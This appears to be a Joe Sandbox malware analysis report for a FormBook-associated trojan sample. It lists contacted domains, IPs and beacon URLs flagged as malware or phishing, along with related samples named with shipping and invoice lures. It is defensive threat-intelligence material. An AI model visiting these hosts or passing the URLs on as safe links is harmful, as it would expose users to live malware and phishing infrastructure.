          http://www.l1z3x.cfdReferer:0%Avira URL Cloudsafe
          http://www.terminalcomputer.infoReferer:0%Avira URL Cloudsafe
          http://www.terminalcomputer.info/us94/100%Avira URL Cloudmalware
          http://www.ontheroadfromdamascus.comReferer:0%Avira URL Cloudsafe
          http://www.hanabi104.online/us94/100%Avira URL Cloudmalware
          http://www.66xecqk.top/us94/100%Avira URL Cloudphishing
          http://www.nazadypro.shop0%Avira URL Cloudsafe

          Domains and IPs

          Contacted Domains

          NameIPActiveMaliciousAntivirus DetectionReputation
          www.emdefencetech.com
          		91.195.240.123
          		truetrue
            		unknown
            www.nazadypro.shop
            		104.21.48.68
            		truetrue
              		unknown
              soccercitycupsc.com
              		66.235.200.145
              		truetrue
                		unknown
                www.69v39.top
                		34.120.175.65
                		truefalse
                  		unknown
                  www.soccercitycupsc.com
                  		unknown
                  		unknowntrue
                    		unknown

                    Contacted URLs

                    NameMaliciousAntivirus DetectionReputation
                    http://www.soccercitycupsc.com/us94/?FV9l7b=S5srMiwBCDtV4rjo3jAT9rEjkkSDttoSOLAmgXzTQBVP9tcOlEr2qFRjTuqDw5Sxe1FF&BbW=QzuhmF0pKLtrue
                    • Avira URL Cloud: safe
                    		unknown
                    http://www.69v39.top/us94/?FV9l7b=gRE/KZOmUIl0E9O5tIrQ1aSnWhjtkyGjsCPW33OGocf8yDxoSBdOJbLmmBtR+4NwNN+r&BbW=QzuhmF0pKLfalse
                    • Avira URL Cloud: phishing
                    		unknown
                    www.l1z3x.cfd/us94/true
                    • Avira URL Cloud: safe
                    		low
                    http://www.emdefencetech.com/us94/?FV9l7b=09CVAw2tWRgghkhUEy5C5oLzHr5PLkNGN/bgaCa/HPdap5UhvkEM57dmWPBbgbvu1iSh&BbW=QzuhmF0pKLtrue
                    • Avira URL Cloud: malware
                    		unknown

                    URLs from Memory and Binaries

                    NameSourceMaliciousAntivirus DetectionReputation
                    http://www.b-cr5.inkReferer:explorer.exe, 00000003.00000002.2516134404.000000000BD57000.00000004.00000001.00020000.00000000.sdmpfalse
                    • Avira URL Cloud: safe
                    		unknown
                    http://www.l1z3x.cfd/us94/www.abithashop.comexplorer.exe, 00000003.00000002.2516134404.000000000BD57000.00000004.00000001.00020000.00000000.sdmpfalse
                    • Avira URL Cloud: safe
                    		unknown
                    http://www.b-cr5.ink/us94/explorer.exe, 00000003.00000002.2516134404.000000000BD57000.00000004.00000001.00020000.00000000.sdmpfalse
                    • Avira URL Cloud: malware
                    		unknown
                    https://g.alicdn.com/woodpeckerx/jssdk/plugins/performance.jsexplorer.exe, 00000003.00000002.2520807762.00000000105FF000.00000004.80000000.00040000.00000000.sdmp, msdt.exe, 00000004.00000002.2501650937.00000000056CF000.00000004.10000000.00040000.00000000.sdmpfalse
                      		high
                      http://schemas.miexplorer.exe, 00000003.00000002.2516134404.000000000BD57000.00000004.00000001.00020000.00000000.sdmpfalse
                      • URL Reputation: safe
                      		unknown
                      http://www.emdefencetech.comexplorer.exe, 00000003.00000002.2516134404.000000000BD57000.00000004.00000001.00020000.00000000.sdmpfalse
                      • Avira URL Cloud: safe
                      		unknown
                      http://www.hanabi104.onlineexplorer.exe, 00000003.00000002.2516134404.000000000BD57000.00000004.00000001.00020000.00000000.sdmpfalse
                      • Avira URL Cloud: safe
                      		unknown
                      https://g.alicdn.com/woodpeckerx/jssdk/plugins/globalerror.jsexplorer.exe, 00000003.00000002.2520807762.00000000105FF000.00000004.80000000.00040000.00000000.sdmp, msdt.exe, 00000004.00000002.2501650937.00000000056CF000.00000004.10000000.00040000.00000000.sdmpfalse
                        		high
                        http://www.hot-tubs-59198.bond/us94/www.simarnit.comexplorer.exe, 00000003.00000002.2516134404.000000000BD57000.00000004.00000001.00020000.00000000.sdmptrue
                        • Avira URL Cloud: malware
                        		unknown
                        http://www.b-cr5.inkexplorer.exe, 00000003.00000002.2516134404.000000000BD57000.00000004.00000001.00020000.00000000.sdmpfalse
                        • Avira URL Cloud: safe
                        		unknown
                        https://powerpoint.office.comcemberexplorer.exe, 00000003.00000000.1272310868.000000000BB08000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.2516134404.000000000BB08000.00000004.00000001.00020000.00000000.sdmpfalse
                        • Avira URL Cloud: safe
                        		unknown
                        http://www.abithashop.comexplorer.exe, 00000003.00000002.2516134404.000000000BD57000.00000004.00000001.00020000.00000000.sdmpfalse
                        • Avira URL Cloud: safe
                        		unknown
                        http://www.abithashop.comReferer:explorer.exe, 00000003.00000002.2516134404.000000000BD57000.00000004.00000001.00020000.00000000.sdmpfalse
                        • Avira URL Cloud: safe
                        		unknown
                        https://deff.nelreports.net/api/report?cat=msnexplorer.exe, 00000003.00000000.1267280115.00000000093F5000.00000004.00000001.00020000.00000000.sdmpfalse
                        • URL Reputation: safe
                        		unknown
                        http://www.l1z3x.cfdexplorer.exe, 00000003.00000002.2516134404.000000000BD57000.00000004.00000001.00020000.00000000.sdmpfalse
                        • Avira URL Cloud: safe
                        		unknown
                        http://www.truijkl.xyz/us94/www.j5tm84qrs.topexplorer.exe, 00000003.00000002.2516134404.000000000BD57000.00000004.00000001.00020000.00000000.sdmpfalse
                        • Avira URL Cloud: phishing
                        		unknown
                        https://excel.office.comexplorer.exe, 00000003.00000000.1272310868.000000000BC1A000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.2516134404.000000000BC1A000.00000004.00000001.00020000.00000000.sdmpfalse
                          		high
                          http://schemas.microexplorer.exe, 00000003.00000000.1259489346.0000000002BD0000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000003.00000000.1265595351.0000000007770000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000003.00000000.1265570865.0000000007760000.00000002.00000001.00040000.00000000.sdmpfalse
                          • URL Reputation: safe
                          		unknown
                          http://www.hot-tubs-59198.bondexplorer.exe, 00000003.00000002.2516134404.000000000BD57000.00000004.00000001.00020000.00000000.sdmpfalse
                          • Avira URL Cloud: safe
                          		unknown
                          http://www.l1z3x.cfd/us94/explorer.exe, 00000003.00000002.2516134404.000000000BD57000.00000004.00000001.00020000.00000000.sdmpfalse
                          • Avira URL Cloud: safe
                          		unknown
                          http://www.69v39.top/us94/explorer.exe, 00000003.00000002.2516134404.000000000BD57000.00000004.00000001.00020000.00000000.sdmpfalse
                          • Avira URL Cloud: phishing
                          		unknown
                          http://www.soccercitycupsc.comReferer:explorer.exe, 00000003.00000002.2516134404.000000000BD57000.00000004.00000001.00020000.00000000.sdmpfalse
                          • Avira URL Cloud: safe
                          		unknown
                          http://www.j5tm84qrs.topexplorer.exe, 00000003.00000002.2516134404.000000000BD57000.00000004.00000001.00020000.00000000.sdmpfalse
                          • Avira URL Cloud: safe
                          		unknown
                          http://www.emdefencetech.comReferer:explorer.exe, 00000003.00000002.2516134404.000000000BD57000.00000004.00000001.00020000.00000000.sdmpfalse
                          • Avira URL Cloud: safe
                          		unknown
                          http://www.nazadypro.shop/us94/explorer.exe, 00000003.00000002.2516134404.000000000BD57000.00000004.00000001.00020000.00000000.sdmpfalse
                          • Avira URL Cloud: malware
                          		unknown
                          http://www.truijkl.xyzexplorer.exe, 00000003.00000002.2516134404.000000000BD57000.00000004.00000001.00020000.00000000.sdmpfalse
                          • Avira URL Cloud: safe
                          		unknown
                          http://www.j5tm84qrs.top/us94/www.66xecqk.topexplorer.exe, 00000003.00000002.2516134404.000000000BD57000.00000004.00000001.00020000.00000000.sdmpfalse
                          • Avira URL Cloud: phishing
                          		unknown
                          http://www.nazadypro.shop/us94/www.soccercitycupsc.comexplorer.exe, 00000003.00000002.2516134404.000000000BD57000.00000004.00000001.00020000.00000000.sdmpfalse
                          • Avira URL Cloud: malware
                          		unknown
                          https://hm.baidu.com/hm.js?explorer.exe, 00000003.00000002.2520807762.00000000105FF000.00000004.80000000.00040000.00000000.sdmp, msdt.exe, 00000004.00000002.2501650937.00000000056CF000.00000004.10000000.00040000.00000000.sdmpfalse
                            		high
                            http://www.66xecqk.topReferer:explorer.exe, 00000003.00000002.2516134404.000000000BD57000.00000004.00000001.00020000.00000000.sdmpfalse
                            • Avira URL Cloud: safe
                            		unknown
                            https://g.alicdn.com/woodpeckerx/jssdk/wpkReporter.jsexplorer.exe, 00000003.00000002.2520807762.00000000105FF000.00000004.80000000.00040000.00000000.sdmp, msdt.exe, 00000004.00000002.2501650937.00000000056CF000.00000004.10000000.00040000.00000000.sdmpfalse
                              		high
                              http://www.69v39.top/us94/www.l1z3x.cfdexplorer.exe, 00000003.00000002.2516134404.000000000BD57000.00000004.00000001.00020000.00000000.sdmpfalse
                              • Avira URL Cloud: phishing
                              		unknown
                              http://www.soccercitycupsc.com/us94/explorer.exe, 00000003.00000002.2516134404.000000000BD57000.00000004.00000001.00020000.00000000.sdmpfalse
                              • Avira URL Cloud: safe
                              		unknown
                              http://www.soccercitycupsc.com/us94/www.69v39.topexplorer.exe, 00000003.00000002.2516134404.000000000BD57000.00000004.00000001.00020000.00000000.sdmpfalse
                              • Avira URL Cloud: safe
                              		unknown
                              http://schemas.microsoft.coexplorer.exe, 00000003.00000002.2516134404.000000000BD57000.00000004.00000001.00020000.00000000.sdmpfalse
                              • URL Reputation: safe
                              		unknown
                              http://www.66xecqk.top/us94/www.terminalcomputer.infoexplorer.exe, 00000003.00000002.2516134404.000000000BD57000.00000004.00000001.00020000.00000000.sdmpfalse
                              • Avira URL Cloud: phishing
                              		unknown
                              http://www.abithashop.com/us94/explorer.exe, 00000003.00000002.2516134404.000000000BD57000.00000004.00000001.00020000.00000000.sdmpfalse
                              • Avira URL Cloud: malware
                              		unknown
                              http://www.j5tm84qrs.top/us94/explorer.exe, 00000003.00000002.2516134404.000000000BD57000.00000004.00000001.00020000.00000000.sdmpfalse
                              • Avira URL Cloud: phishing
                              		unknown
                              http://www.ontheroadfromdamascus.com/us94/explorer.exe, 00000003.00000002.2516134404.000000000BD57000.00000004.00000001.00020000.00000000.sdmpfalse
                              • Avira URL Cloud: malware
                              		unknown
                              http://www.hanabi104.onlineReferer:explorer.exe, 00000003.00000002.2516134404.000000000BD57000.00000004.00000001.00020000.00000000.sdmpfalse
                              • Avira URL Cloud: safe
                              		unknown
                              http://www.nazadypro.shopReferer:explorer.exe, 00000003.00000002.2516134404.000000000BD57000.00000004.00000001.00020000.00000000.sdmpfalse
                              • Avira URL Cloud: safe
                              		unknown
                              http://www.66xecqk.topexplorer.exe, 00000003.00000002.2516134404.000000000BD57000.00000004.00000001.00020000.00000000.sdmpfalse
                              • Avira URL Cloud: safe
                              		unknown
                              https://word.office.comexplorer.exe, 00000003.00000000.1272310868.000000000BC1A000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.2516134404.000000000BC1A000.00000004.00000001.00020000.00000000.sdmpfalse
                                		high
                                http://www.terminalcomputer.infoexplorer.exe, 00000003.00000002.2516134404.000000000BD57000.00000004.00000001.00020000.00000000.sdmpfalse
                                • Avira URL Cloud: safe
                                		unknown
                                http://www.hot-tubs-59198.bond/us94/explorer.exe, 00000003.00000002.2516134404.000000000BD57000.00000004.00000001.00020000.00000000.sdmpfalse
                                • Avira URL Cloud: malware
                                		unknown
                                http://www.j5tm84qrs.topReferer:explorer.exe, 00000003.00000002.2516134404.000000000BD57000.00000004.00000001.00020000.00000000.sdmpfalse
                                • Avira URL Cloud: safe
                                		unknown
                                http://www.truijkl.xyzReferer:explorer.exe, 00000003.00000002.2516134404.000000000BD57000.00000004.00000001.00020000.00000000.sdmpfalse
                                • Avira URL Cloud: safe
                                		unknown
                                http://www.simarnit.com/us94/www.hanabi104.onlineexplorer.exe, 00000003.00000002.2516134404.000000000BD57000.00000004.00000001.00020000.00000000.sdmpfalse
                                • Avira URL Cloud: malware
                                		unknown
                                http://www.emdefencetech.com/us94/www.nazadypro.shopexplorer.exe, 00000003.00000002.2516134404.000000000BD57000.00000004.00000001.00020000.00000000.sdmpfalse
                                • Avira URL Cloud: malware
                                		unknown
                                http://www.ontheroadfromdamascus.comexplorer.exe, 00000003.00000002.2516134404.000000000BD57000.00000004.00000001.00020000.00000000.sdmpfalse
                                • Avira URL Cloud: safe
                                		unknown
                                http://schemas.micrexplorer.exe, 00000003.00000002.2516134404.000000000BD57000.00000004.00000001.00020000.00000000.sdmpfalse
                                • URL Reputation: safe
                                		unknown
                                https://outlook.comexplorer.exe, 00000003.00000000.1272310868.000000000BC1A000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.2516134404.000000000BC1A000.00000004.00000001.00020000.00000000.sdmpfalse
                                  		high
                                  http://www.emdefencetech.com/us94/explorer.exe, 00000003.00000002.2516134404.000000000BD57000.00000004.00000001.00020000.00000000.sdmpfalse
                                  • Avira URL Cloud: malware
                                  		unknown
                                  http://www.abithashop.com/us94/www.truijkl.xyzexplorer.exe, 00000003.00000002.2516134404.000000000BD57000.00000004.00000001.00020000.00000000.sdmpfalse
                                  • Avira URL Cloud: malware
                                  		unknown
                                  http://www.hot-tubs-59198.bondReferer:explorer.exe, 00000003.00000002.2516134404.000000000BD57000.00000004.00000001.00020000.00000000.sdmpfalse
                                  • Avira URL Cloud: safe
                                  		unknown
                                  http://www.terminalcomputer.info/us94/www.b-cr5.inkexplorer.exe, 00000003.00000002.2516134404.000000000BD57000.00000004.00000001.00020000.00000000.sdmpfalse
                                  • Avira URL Cloud: malware
                                  		unknown
                                  http://www.simarnit.comexplorer.exe, 00000003.00000002.2516134404.000000000BD57000.00000004.00000001.00020000.00000000.sdmpfalse
                                  • Avira URL Cloud: safe
                                  		unknown
                                  http://www.simarnit.com/us94/explorer.exe, 00000003.00000002.2516134404.000000000BD57000.00000004.00000001.00020000.00000000.sdmpfalse
                                  • Avira URL Cloud: malware
                                  		unknown
                                  http://www.soccercitycupsc.comexplorer.exe, 00000003.00000002.2516134404.000000000BD57000.00000004.00000001.00020000.00000000.sdmpfalse
                                  • Avira URL Cloud: safe
                                  		unknown
                                  http://www.69v39.topReferer:explorer.exe, 00000003.00000002.2516134404.000000000BD57000.00000004.00000001.00020000.00000000.sdmpfalse
                                  • Avira URL Cloud: safe
                                  		unknown
                                  http://www.69v39.topexplorer.exe, 00000003.00000002.2516134404.000000000BD57000.00000004.00000001.00020000.00000000.sdmpfalse
                                  • Avira URL Cloud: safe
                                  		unknown
                                  http://www.truijkl.xyz/us94/explorer.exe, 00000003.00000002.2516134404.000000000BD57000.00000004.00000001.00020000.00000000.sdmpfalse
                                  • Avira URL Cloud: phishing
                                  		unknown
                                  http://www.ontheroadfromdamascus.com/us94/www.hot-tubs-59198.bondexplorer.exe, 00000003.00000002.2516134404.000000000BD57000.00000004.00000001.00020000.00000000.sdmpfalse
                                  • Avira URL Cloud: malware
                                  		unknown
                                  http://www.simarnit.comReferer:explorer.exe, 00000003.00000002.2516134404.000000000BD57000.00000004.00000001.00020000.00000000.sdmpfalse
                                  • Avira URL Cloud: safe
                                  		unknown
                                  https://api.msn.com/explorer.exe, 00000003.00000000.1267280115.00000000093C3000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.2509722390.00000000093C3000.00000004.00000001.00020000.00000000.sdmpfalse
                                    		high
                                    http://www.l1z3x.cfdReferer:explorer.exe, 00000003.00000002.2516134404.000000000BD57000.00000004.00000001.00020000.00000000.sdmpfalse
                                    • Avira URL Cloud: safe
                                    		unknown
                                    http://www.terminalcomputer.infoReferer:explorer.exe, 00000003.00000002.2516134404.000000000BD57000.00000004.00000001.00020000.00000000.sdmpfalse
                                    • Avira URL Cloud: safe
                                    		unknown
                                    http://www.terminalcomputer.info/us94/explorer.exe, 00000003.00000002.2516134404.000000000BD57000.00000004.00000001.00020000.00000000.sdmpfalse
                                    • Avira URL Cloud: malware
                                    		unknown
                                    http://www.hanabi104.online/us94/explorer.exe, 00000003.00000002.2516134404.000000000BD57000.00000004.00000001.00020000.00000000.sdmpfalse
                                    • Avira URL Cloud: malware
                                    		unknown
                                    http://www.ontheroadfromdamascus.comReferer:explorer.exe, 00000003.00000002.2516134404.000000000BD57000.00000004.00000001.00020000.00000000.sdmpfalse
                                    • Avira URL Cloud: safe
                                    		unknown
                                    http://www.66xecqk.top/us94/explorer.exe, 00000003.00000002.2516134404.000000000BD57000.00000004.00000001.00020000.00000000.sdmpfalse
                                    • Avira URL Cloud: phishing
                                    		unknown
                                    http://www.nazadypro.shopexplorer.exe, 00000003.00000002.2516134404.000000000BD57000.00000004.00000001.00020000.00000000.sdmpfalse
                                    • Avira URL Cloud: safe
                                    		unknown

                                    World Map of Contacted IPs

                                    • No. of IPs < 25%
                                    • 25% < No. of IPs < 50%
                                    • 50% < No. of IPs < 75%
                                    • 75% < No. of IPs

                                    Public IPs

                                    IPDomainCountryFlagASNASN NameMalicious
                                    66.235.200.145
                                    		soccercitycupsc.comUnited States
                                    		13335CLOUDFLARENETUStrue
                                    34.120.175.65
                                    		www.69v39.topUnited States
                                    		15169GOOGLEUSfalse
                                    192.229.221.95
                                    		unknownUnited States
                                    		15133EDGECASTUSfalse
                                    91.195.240.123
                                    		www.emdefencetech.comGermany
                                    		47846SEDO-ASDEtrue
                                    104.21.48.68
                                    		www.nazadypro.shopUnited States
                                    		13335CLOUDFLARENETUStrue
                                    204.79.197.203
                                    		unknownUnited States
                                    		8068MICROSOFT-CORP-MSN-AS-BLOCKUSfalse

                                    General Information

                                    Joe Sandbox Version:38.0.0 Beryl
                                    Analysis ID:1304954
                                    Start date and time:2023-09-07 08:37:04 +02:00
                                    Joe Sandbox Product:CloudBasic
                                    Overall analysis duration:0h 13m 41s
                                    Hypervisor based Inspection enabled:false
                                    Report type:full
                                    Cookbook file name:default.jbs
                                    Analysis system description:Windows 10, Office Professional Plus 2016, Chrome 115, Firefox 115, Adobe Reader 23, Java 8 Update 381
                                    Number of analysed new started processes analysed:13
                                    Number of new started drivers analysed:0
                                    Number of existing processes analysed:0
                                    Number of existing drivers analysed:0
                                    Number of injected processes analysed:1
                                    Technologies:
                                    • HCA enabled
                                    • EGA enabled
                                    • HDC enabled
                                    • AMSI enabled
                                    Analysis Mode:default
                                    Analysis stop reason:Timeout
                                    Sample file name:2FcJgghyXg.exe
                                    Original Sample Name:4f91d6f43a69717ff16f3c09dcd0e7e8.exe
                                    Detection:MAL
                                    Classification:mal100.troj.evad.winEXE@173/1@4/6
                                    EGA Information:
                                    • Successful, ratio: 100%
                                    HDC Information:Failed
                                    HCA Information:
                                    • Successful, ratio: 100%
                                    • Number of executed functions: 78
                                    • Number of non-executed functions: 155
                                    Cookbook Comments:
                                    • Found application associated with file extension: .exe

                                    Warnings

                                    • Exclude process from analysis (whitelisted): dllhost.exe, SIHClient.exe, SgrmBroker.exe, svchost.exe
                                    • Excluded domains from analysis (whitelisted): fs.microsoft.com, geo.prod.do.dsp.mp.microsoft.com, slscr.update.microsoft.com, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
                                    • Not all processes where analyzed, report is missing behavior information
                                    • Report creation exceeded maximum time and may have missing disassembly code information.
                                    • Report size getting too big, too many NtEnumerateKey calls found.
                                    • Report size getting too big, too many NtOpenKeyEx calls found.
                                    • Report size getting too big, too many NtQueryValueKey calls found.
                                    • VT rate limit hit for: 2FcJgghyXg.exe

                                    Simulations

                                    Behavior and APIs

                                    TimeTypeDescription
                                    08:38:13API Interceptor1x Sleep call for process: 2FcJgghyXg.exe modified
                                    08:38:23API Interceptor1504x Sleep call for process: explorer.exe modified

                                    Joe Sandbox View / Context

                                    IPs

                                    MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                    66.235.200.145ClbrTLBbVA.exeGet hashmaliciousFormBookBrowse
                                    • www.adornmentwithadrienne.com/ne28/?yXB=JRhSHg+E0kVeMb5bWxBNKjX7GZb/Gd7gTaCbDgRTO6UaOuEkMa6xiN+s4LYpa+moX3ut&DR-Hl=f48d7hbXPvmPj
                                    r5573XLX_Confirming_685738_Permiso.vbsGet hashmaliciousFormBookBrowse
                                    • www.shivanshnegi.com/hb6q/?kF=SLfnpSH8JFkD4JBvPgRq/MrmccQ0IKCWuyGgdNK0iEg51HeS6g2oNSkb61BOtzoBwxfmw1AFCol6MwSDOKA9DD+yD/DKRM1OfQ==&LPW33a=EJ_Y5C3RY2AMjvtQ
                                    BBVA-Confirming_Facturas_Pagadas_al_Vencimiento.vbsGet hashmaliciousFormBookBrowse
                                    • www.shivanshnegi.com/hb6q/?3t-_2h=lQe4u&_30_T=SLfnpSH8JFkD4JBvPgRq/MrmccQ0IKCWuyGgdNK0iEg51HeS6g2oNSkb61BOtzoBwxfmw1AFCol6MwSDOKA9DD+yD/DKRM1OfQ==
                                    GlobalImagingDocuments9575734549684.vbsGet hashmaliciousFormBookBrowse
                                    • www.shivanshnegi.com/g0c0/?J1ZahCdL=C0KZfCw3M9dgcVMegUaXT5mHrabIsWwgKIwZghABK/zPnQmv2J3/nbZH+UKlayZCqk+j1NVXNAMuRNCfj24K4Q5P5C8DM0dqWdfKhTZFySIl&uEk=kKVhb1ODb
                                    0ySMPNiDoA.exeGet hashmaliciousFormBookBrowse
                                    • www.theunstoppabletravelers.com/a19i/?4hkT=rLtsLZhSdQwFRkvaG8FjiaGEB8J9o/aSV6LeKN0wyHa1R2N5aTBKUDHw+apOLNME5B3p&aHzLRr=9rl0dna
                                    6014853.exeGet hashmaliciousFormBookBrowse
                                    • www.firepowerexpo.com/f649/?Ih3=m1lqWHCBQ/kUfIId9G1Zl7+cXxQgMOESuv3uKkpy1j9VjbvHsanxuQVfMZjTZucRw3bqX9o71XHJz8Ptxs35IAYHht5fw0SXRQ==&FTBSzg=_AtxeQJqoYkM5z7B
                                    DHL Consignment Details_pdf.exeGet hashmaliciousFormBookBrowse
                                    • www.atwatercab.com/s20g/?x8b=8pNLsfJxhBPPAD4P&d48PB=rZ/46zgpbKJOe2X3A4FYFLQg1vAXxuRWnT2LQvG1tr3ZSe4vYgV8EIvoDLg6imzOZAE7E347lg==
                                    1.exeGet hashmaliciousFormBookBrowse
                                    • www.developingdata.co.uk/jsmf/?E48=dYCiqgXuG3hVFy4ipi3itDieoHPdLKuMx6EIns39DPxXLWZ2l4orKCxGCYXf6kzaGglL4C6u2CyuHPssMtjkBh3HyQ5WL0IwEQ==&w4s=nTG8FX4X
                                    zapytanie ofertowe09356.exeGet hashmaliciousFormBookBrowse
                                    • www.sianghan.com/vweq/?iX_ll=Sv9LEx&n6CtjVk=kEv03q1ymUsS7T5lOAg/bSIihwA396N/BtF/QOyCK71sVhLsu3phc0aAw/jgZiM4T701
                                    2kYemccxJ5.exeGet hashmaliciousFormBookBrowse
                                    • www.gasgangllc.com/zgtb/?u6yHt6=XBCDKB81ZNWK6s/uuzkNoySF5lyaVown+0rckZe+lzAxbh/PfzDZwo02x7GwOXqaqmSd&AN9X=7nuP
                                    MV HARMONY STAR.exeGet hashmaliciousFormBookBrowse
                                    • www.cuttersonthemove.com/bh33/?b8=nRpjtsv9dGMjODFvv8PBqOl+WQV6kIYkn94WJMZzdKBOddTSSkk5WaiWOfXckqyNRw9/&tR-HE=EVPly4e
                                    SAO.exeGet hashmaliciousFormBookBrowse
                                    • www.dotdrugconsort.com/gfv7/?RH=rr99yo8huE5g/66Pd3jHsFjG/2+3TdEdD1qxJhEhEHZXE8sDFlsIakaAiVUDDJfopEwKRefeog==&p6d=2dxpMhQPtn88
                                    shipping documents.exeGet hashmaliciousFormBookBrowse
                                    • www.dotdrugconsort.com/gfv7/?C2MxCH=rr99yo8huE5g/66Pd3jHsFjG/2+3TdEdD1qxJhEhEHZXE8sDFlsIakaAiW4Tf4DTuxZb&w8=nR-XW
                                    DHL_Shipping Documents_pdf.exeGet hashmaliciousFormBook, GuLoaderBrowse
                                    • www.cuttersonthemove.com/cloo/?-ZU8-t=-ZgHER&4h=8Vsp4oOYTT9URIh5rrTGBQIuyyYsyJNaKilDByrIU+o0WWwtn/eTnzBLFT1m1siy9eBE
                                    PO_05964_pdf.exeGet hashmaliciousFormBook, GuLoaderBrowse
                                    • www.cuttersonthemove.com/cloo/?VHQtZNj=8Vsp4oOYTT9URIh5rrTGBQIuyyYsyJNaKilDByrIU+o0WWwtn/eTnzBLFT1m1siy9eBE&4hU4I=a2M4HdWh00
                                    Invoice.xlsxGet hashmaliciousFormBookBrowse
                                    • www.cuttersonthemove.com/wfc6/?AVAtZ=XDN8T76mXlOxosJFEur7mLhKdbei0l7wdtRGO3wHKcKF7/3+7zWyFQC0IosjPS9M67f6zA==&1bqp=1bl0iJ
                                    inquirt valete.exeGet hashmaliciousFormBook, GuLoaderBrowse
                                    • www.blackeagleholdingsllc.com/bjai/?8pqLLLI=nr49rTD4f0noD60ncNBy/0C8JFsVren/6tq46Gwfuu+h8bsfnkMI8OOwpPywKu+mTNdX&GZu=-ZNTK8
                                    new inquiry.exeGet hashmaliciousFormBook, GuLoaderBrowse
                                    • www.blackeagleholdingsllc.com/bjai/?qRlpf=nr49rTD4f0noD60ncNBy/0C8JFsVren/6tq46Gwfuu+h8bsfnkMI8OOwpPywKu+mTNdX&nTUL=8pvLmv8
                                    SecuriteInfo.com.Variant.Tedy.137414.25339.exeGet hashmaliciousFormBookBrowse
                                    • www.nothingbutdd.com/d23n/?fZLTHxQx=85hU1UZfGUnIF0coTZSIBXJgwcVw2CGuP9+/GqGWIrwThDHUcVonadWzL6RHghH9Wtpc&VhuPB=1bbpDleH3
                                    CIQ-PO16266.jsGet hashmaliciousFormBook, VjW0rmBrowse
                                    • www.muddybootslife.com/np8s/?zVB=5R3gKgAJtID3s3glssHXeRhFadAM4oJIjGTDo+g9ImvY9tNBMPSBarPOG5Bgot7e+72k&CTr8g=z48HVPSHfp

                                    Domains

                                    No context

                                    ASNs

                                    MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                    CLOUDFLARENETUShttp://oscottmanorbhamsch.myportfolio.comGet hashmaliciousHTMLPhisherBrowse
                                    • 104.16.123.96
                                    https://r20.rs6.net/tn.jsp?f=001enZBNUqZfpj1FepArritjLRjt_EKhELTseQKTXX2JKdWpKe5Ekm1IZdP6BWtX30K6DQp4j0sTmnWrRaJCvnXZxLylsXRok8yoXxQ_c3Ba-_zPFysg_YaPRKyA82xnK4D1niftUzcL2l62Bai0cirWfr-HIV586BA&c=5l6WE3nrInjfx0lNsQWQHjzM0JZ6Vs3yJKPQXtFmhE9mzB-uWnaGuw==&ch=u4rJc66k2xMP4EErHDmBgS5aV-3lgIbR7vZroNuEmQy0AQa4tvEOfg==#aXZhbi50YW5AY2hhbmdpYWlycG9ydC5jb20=Get hashmaliciousHTMLPhisherBrowse
                                    • 104.21.44.226
                                    https://r20.rs6.net/tn.jsp?f=001enZBNUqZfpj1FepArritjLRjt_EKhELTseQKTXX2JKdWpKe5Ekm1IZdP6BWtX30K6DQp4j0sTmnWrRaJCvnXZxLylsXRok8yoXxQ_c3Ba-_zPFysg_YaPRKyA82xnK4D1niftUzcL2l62Bai0cirWfr-HIV586BA&c=5l6WE3nrInjfx0lNsQWQHjzM0JZ6Vs3yJKPQXtFmhE9mzB-uWnaGuw==&ch=u4rJc66k2xMP4EErHDmBgS5aV-3lgIbR7vZroNuEmQy0AQa4tvEOfg==#aXZhbi50YW5AY2hhbmdpYWlycG9ydC5jb20=Get hashmaliciousUnknownBrowse
                                    • 104.17.2.184
                                    http://amos-malware.ru/sendlogGet hashmaliciousUnknownBrowse
                                    • 1.1.1.1
                                    SongHong_BankSlip+Statement.pdf.exeGet hashmaliciousLokibotBrowse
                                    • 172.67.166.54
                                    https://unitedcatalystcorporation.top/?xvdnxdllGet hashmaliciousHTMLPhisherBrowse
                                    • 1.1.1.1
                                    https://unitedcatalystcorporation.top/?xvdnxdllGet hashmaliciousHTMLPhisherBrowse
                                    • 1.1.1.1
                                    DEMONS.x86.elfGet hashmaliciousMiraiBrowse
                                    • 104.16.179.54
                                    https://padlet.com/scans/overview-2xii4m9rdjqre13oGet hashmaliciousUnknownBrowse
                                    • 172.64.144.177
                                    http://tafeconnect.comGet hashmaliciousUnknownBrowse
                                    • 1.1.1.1
                                    http://tafeconnect.comGet hashmaliciousUnknownBrowse
                                    • 1.1.1.1
                                    https://ss0-ceossonline-eur.web.app/12906/?ZG9sLm1vbXBob3RlekBhY2l3b3JsZHdpZGUuY29t?v=129066cS0/Get hashmaliciousUnknownBrowse
                                    • 104.26.0.188
                                    SecuriteInfo.com.Win32.PWSX-gen.6245.5931.exeGet hashmaliciousAgentTeslaBrowse
                                    • 162.159.138.232
                                    https://padlet.com/scans/overview-2xii4m9rdjqre13oGet hashmaliciousUnknownBrowse
                                    • 172.64.144.177
                                    7l63xDVQ0j.rtfGet hashmaliciousFormBookBrowse
                                    • 66.235.200.147
                                    https://e91a04.evarweb.com/hash/#nobody@nobody.orgGet hashmaliciousUnknownBrowse
                                    • 104.21.56.22
                                    pXH7bw4qXo.exeGet hashmaliciousRedLineBrowse
                                    • 104.20.68.143
                                    https://gem.godaddy.com/signups/activate/MS0tUGFHV1Q1anVneGRtbmVaWmIvZzBLakgxeXhYeDNVS3lrK1hNNUpzd05JemF3SlBXVU9ESUl3cmUxQkRrckcwZzJkVVB6UTFYdy82YWNDUFM3UXpkR0RJPS0tODJEc2ZjclVzNFRhNjRXZi0tQUZFVWZ1cXQyR1FSS1JpazNub0NhUT09?signup=6882505Get hashmaliciousUnknownBrowse
                                    • 104.18.16.182
